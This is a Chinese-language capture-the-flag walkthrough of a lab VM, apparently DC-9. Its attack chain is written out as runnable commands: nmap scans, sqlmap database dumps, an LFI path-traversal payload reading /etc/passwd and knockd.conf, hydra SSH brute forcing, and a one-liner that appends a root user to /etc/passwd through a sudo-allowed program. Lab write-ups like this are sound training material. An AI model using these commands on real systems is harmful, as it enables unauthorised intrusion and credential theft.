前置知识
端口敲门服务 是用来增强安全性的,比如你干了一票逃回宾馆在床上堆满了钱,你关上门(关闭端口)不想让别人进来。这时你同伙来和你商量,为了安全起见,你和他约定好敲门暗号(特定序列),敲门时三下三下地敲(序列号、频率)。然后你就紧张地等他过来,时刻听着敲门(监听),要是听到一下一下敲的,就怀疑是不是警察,要是三下三下敲的,就是同伙来了,你就开门让他进来和你商量(服务),这就是敲门暗号法(knockd)(端口敲门服务)。
靶场搭建
信息打点
kali 扫描存活网段ip ,排除kali本身得到靶场ip192.168.72.145
nmap -sn 192.168.72.1/24

端口全扫描
nmap -p- 192.168.72.145

拿到webshell(未果)
sql注入
通过插件进行web指纹识别没找到利用点
从功能点入手有输入框,尝试抓包跑sqlmap测试是否有sql注入
抓取到的数据包在sqlmap目录下创建1.txt
指定参数search=1*

bash
python sqlmap.py -r 1.txt

爆出数据库
bash
python sqlmap.py -r 1.txt --batch --dbs

爆出staff库
bash
python sqlmap.py -r 1.txt --batch -D Staff --tables

爆出user表格得到账号和密码的MD5哈希
bash
python sqlmap.py -r 1.txt --batch -D Staff --dump

推荐在线碰撞网站
账号密码:admin,transorbital1
文件包含LFI
管理员登录成功后切换功能点点击发现存在file does not exist猜测可能存在文件包含漏洞

前期信息打点已知服务器为linux
验证文件包含漏洞存在逐级增加../跳出当前目录到上一级目录
bash
http://192.168.72.145/manage.php?file=../../../../etc/passwd

但是后续远程文件包含尝试失败
转战ssh
后边查资料发现nmap扫描发现22端口状态为 filtered结合端口敲门

端口敲门
通过文件包含漏洞读取本地配置文件得到敲门的密码可以这样理解 sequence = 7469,8475,9842
bash
http://192.168.72.145/manage.php?file=../../../../etc/knockd.conf

借助kali集成的knock开放ssh
bash
# 敲门开放SSH(在Kali中执行)
knock 192.168.72.145 7469 8475 9842
# 验证22端口是否开放
nmap -p 22 192.168.72.145

新一轮信息收集sql注入
则需要使用sql注入漏洞获取users库中的UserDetails表中的数据
bash
python sqlmap.py -r 1.txt --batch -D users -T UserDetails --dump

让ai进行用户名和密码提取字典处理

利用kali集成的九头蛇工具爆破
bash
hydra -L username.txt -P passwd.txt ssh://192.168.72.145

这里通过得到的三个用户分别是 joeyt Passw0rd 和janitor Ilovepeepee 和chandlerb UrAG0d登录后尝试sudo提权和suid提权无果
最后一轮信息收集敏感文件泄露
bash
ssh janitor@192.168.72.145
Ilovepeepee
ls -al
cat .secrets-for-putin/*

janitor 用户中 发现了一个隐藏文件.secrets-for-putin将得到的密码加入上边的密码本
重新使用九头蛇工具爆破得到一个新用户

权限提升
ssh连接新用户发现存在sudo提权漏洞无密码执行test
bash
ssh fredf@192.168.72.145
B4-Tru3-001
sudo -l

bash
find / -name test.py 2>/dev/null
查找python文件 进行查看功能是 将参数1的内容写到参数2中然后生成一个用户
原理利用 sudo 程序向 /etc/passwd 追加一个 UID=0 的用户条目,然后 su 切换到该用户,获得 root 权限。
bash
HASH=$(openssl passwd -1 -salt hacker 123456); echo "hacker:${HASH}:0:0:root:/root:/bin/bash" > /tmp/hacker; sudo /opt/devstuff/dist/test/test /tmp/hacker /etc/passwd; su hacker
验证提权是否成功
bash
id

拿到通关flag
bash
cd /root
cat theflag.txt

思路整理
信息收集 → 发现80端口开放 + 22端口filtered
↓
SQL注入 → 获取管理员密码哈希 → 破解得到后台密码
↓
登录后台 → 发现LFI漏洞
↓
LFI读取 /etc/knockd.conf → 获得敲门序列
↓
端口敲门 → SSH端口开放
↓
SQL注入 → 获取系统用户密码表
↓
SSH登录 janitor → 发现隐藏目录 → 获取额外密码
↓
SSH登录 fredf
↓
sudo -l → 发现文件追加程序
↓
构造虚假root用户 → 追加到 /etc/passwd
↓
su hacker → 获得root权限
总结
DC系列完结!!!!!!